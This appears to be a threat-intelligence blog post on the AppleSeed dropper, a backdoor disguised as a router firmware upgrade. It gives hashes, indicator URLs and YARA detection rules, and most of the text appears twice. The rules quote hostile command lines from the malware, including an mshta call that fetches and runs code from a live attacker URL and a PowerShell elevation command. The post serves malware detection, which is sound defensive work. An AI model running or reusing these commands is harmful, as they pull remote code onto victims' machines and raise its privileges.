Overview of AppleSeed Dropper
Contents
This blog post will briefly cover some additional details of the AppleSeed backdoor originally covered by ASEC’s AhnLab.
As the ASEC team did a great job detailing the initial access methods in this recent attack, we will skip ahead and dive right into the characteristics and analysis of the malware itself.
Malware Analysis
MD5: 851e33373114fef45d0fe28c6934fa73
SHA256: e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f
File name: firmware upgrade installer.exe
FIle type: Win PE
Size: 408kb
As the file name suggests, the executable file is disguised as a router firmware upgrade program and includes a pop-up window to confirm the start of the supposed upgrade, as well as opening iptime.com in the victim’s web browser (Figure 1).
While the victim may be under the assumption that an upgrade is in progress, the backdoor is installing itself and creating multiple files in the background.
Of note, the backdoor deleted files as soon as their purpose was served, so unfortunately some files were not able to be retrieved. Digging in …
As the ASEC team did a great job detailing the initial access methods in this recent attack, we will skip ahead and dive right into the characteristics and analysis of the malware itself.
Malware Analysis
MD5: 851e33373114fef45d0fe28c6934fa73
SHA256: e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f
File name: firmware upgrade installer.exe
FIle type: Win PE
Size: 408kb
As the file name suggests, the executable file is disguised as a router firmware upgrade program and includes a pop-up window to confirm the start of the supposed upgrade, as well as opening iptime.com in the victim’s web browser (Figure 1).
While the victim may be under the assumption that an upgrade is in progress, the backdoor is installing itself and creating multiple files in the background.
Of note, the backdoor deleted files as soon as their purpose was served, so unfortunately some files were not able to be retrieved. Digging in …
IoC
http://\ProgramData\Firmware\Microsoft\Windows\Defender.
http://leomin.dothome.co.kr/update/?mode=login
https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf
https://research.splunk.com/endpoint/executables_or_script_creation_in_suspicious_path/
https://iptime.com
https://asec.ahnlab.com/ko/34883/
e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea
851e33373114fef45d0fe28c6934fa73
e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f
rule NK_APT_AppleSeed_Dropper {
meta:
description = ” – file firmware upgrade installer.exe”
author = “Michael Rippey”
reference = “https://asec.ahnlab.com/ko/34883/”
date = “2022-06-01”
hash = “e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f”
strings:
$a = “powershell.exe start-process \”%s\” -argumentlist ‘%s’ -verb runas” fullword wide
$b1 = “mshta.exe http://leomin.dothome.co.kr/update/?mode=login” fullword ascii
$b2 = “USER32.dll” fullword ascii
$b3 = “KERNEL32.dll” fullword ascii
$b4 = “kernel32.dll” fullword wide
$b5 = “mscoree.dll” fullword wide
$b6 = “https://iptime.com” fullword wide
$b7 = “broken pipe” fullword ascii
$b8 = “executable format error” fullword ascii
$b9 = “host unreachable” fullword ascii
$b10 = “connection already in progress” fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and
1 of ($a*) and 4 of them
}
rule NK_APT_AppleSeed_Backdoor {
meta:
description = ” – file AutoUpdate.dll”
author = “Michael Rippey”
reference = “https://asec.ahnlab.com/ko/34883/”
date = “2022-06-01”
hash = “e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea”
strings:
$a1 = “ADVAPI32.dll” fullword ascii
$a2 = “KERNEL32.DLL” fullword ascii
$a3 = “freed.dll” fullword ascii
$a4 = “outlook” fullword wide
$a5 = “CryptEncrypt” fullword ascii
$a6 = “amily not supporte” fullword ascii
$a7 = “connecyar” fullword ascii
$a8 = “rerictaj” fullword ascii
$a9 = “lrgeabik” fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 400KB and
5 of them
}
http://leomin.dothome.co.kr/update/?mode=login
https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf
https://research.splunk.com/endpoint/executables_or_script_creation_in_suspicious_path/
https://iptime.com
https://asec.ahnlab.com/ko/34883/
e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea
851e33373114fef45d0fe28c6934fa73
e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f
rule NK_APT_AppleSeed_Dropper {
meta:
description = ” – file firmware upgrade installer.exe”
author = “Michael Rippey”
reference = “https://asec.ahnlab.com/ko/34883/”
date = “2022-06-01”
hash = “e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f”
strings:
$a = “powershell.exe start-process \”%s\” -argumentlist ‘%s’ -verb runas” fullword wide
$b1 = “mshta.exe http://leomin.dothome.co.kr/update/?mode=login” fullword ascii
$b2 = “USER32.dll” fullword ascii
$b3 = “KERNEL32.dll” fullword ascii
$b4 = “kernel32.dll” fullword wide
$b5 = “mscoree.dll” fullword wide
$b6 = “https://iptime.com” fullword wide
$b7 = “broken pipe” fullword ascii
$b8 = “executable format error” fullword ascii
$b9 = “host unreachable” fullword ascii
$b10 = “connection already in progress” fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and
1 of ($a*) and 4 of them
}
rule NK_APT_AppleSeed_Backdoor {
meta:
description = ” – file AutoUpdate.dll”
author = “Michael Rippey”
reference = “https://asec.ahnlab.com/ko/34883/”
date = “2022-06-01”
hash = “e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea”
strings:
$a1 = “ADVAPI32.dll” fullword ascii
$a2 = “KERNEL32.DLL” fullword ascii
$a3 = “freed.dll” fullword ascii
$a4 = “outlook” fullword wide
$a5 = “CryptEncrypt” fullword ascii
$a6 = “amily not supporte” fullword ascii
$a7 = “connecyar” fullword ascii
$a8 = “rerictaj” fullword ascii
$a9 = “lrgeabik” fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 400KB and
5 of them
}